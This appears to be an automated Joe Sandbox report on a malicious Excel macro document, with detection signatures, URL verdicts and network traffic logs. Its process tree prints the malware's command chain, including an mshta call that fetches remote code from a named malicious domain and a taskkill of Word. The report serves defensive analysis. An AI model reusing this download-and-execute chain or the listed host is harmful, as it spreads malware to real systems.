Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.Siggen3.17149.8245.21810

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.17149.8245.21810 (renamed file extension from 21810 to xls)
Analysis ID:684646
MD5:50860325a0e4f6f204c76dd262b7df6b
SHA1:f096b272f012f300ebbd2536e45d97cf02852c36
SHA256:6327c67ee4ae318f558e379fbfa071749113398782101c9f3beeb7310e81e725
Tags:xlsx
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Installs a global mouse hook
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2056 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1624 cmdline: cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • PING.EXE (PID: 1648 cmdline: ping -n 8 127.0.0.1 MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
      • cmd.exe (PID: 1528 cmdline: cmd /c start /min taskkill /f /im WINWORD.EXE MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • taskkill.exe (PID: 1732 cmdline: taskkill /f /im WINWORD.EXE MD5: 3722FA501DCB50AE42818F9034906891)
      • mshta.exe (PID: 1464 cmdline: mshta http://facextrade.com.br/wp-includes/certificates/4.txt MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsVirustotal: Detection: 49%Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsMetadefender: Detection: 27%Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsReversingLabs: Detection: 41%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsAvira: detected
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0ver=5.0.3yTAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextraAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0rjAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/1LAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0cumOAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txts.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0n.css))TAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0ET4.0C;Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1Avira URL Cloud: Label: malware
Source: https://facextrade.com.br/#estruturajs?ver=1.0.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1Avira URL Cloud: Label: malware
Source: https://facextrade.com.br/feed/Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0NmAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/t-lazy-srAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2WIAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txt.6.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2$Avira URL Cloud: Label: malware
Source: https://facextrade.com.br/#contatos9Avira URL Cloud: Label: malware
Source: https://facextrade.com.br/#portfolio_section1.24Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngery.flexslider-min.js?Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0.NET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txtmshtaAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)lAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2ET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0(Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txtsmshtaAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.00eEveAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2PcAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6.NET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.202.1bAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/style.csssYAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes=JW&n?H4~bAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.csssAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0rAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0nlAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20r=4.Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/privacy-policyAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.319Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css_&Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3n.js?ver=1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20R$Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/:Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css...Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0http://facextrade.cAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.jsAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204172.1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201AAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jsAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20WVAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/privacy-policyflateAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20Time.js?ver=1.08Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3.NET4.0E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.22WAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20cssAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jsJlAvira URL Cloud: Label: malware
Source: https://facextrade.com.br/onAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30.6Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.cssAvira URL Cloud: Label: malware
Source: facextrade.com.brVirustotal: Detection: 5%Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49180 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\Outlook.batJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
Source: global trafficDNS query: name: facextrade.com.br
Source: global trafficDNS query: name: facextrade.com.br
Source: global trafficDNS query: name: netdna.bootstrapcdn.com
Source: global trafficDNS query: name: translate.google.com
Source: global trafficDNS query: name: storage.ie6countdown.com
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 104.18.11.207:80 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 104.18.11.207:80
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:80
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49176
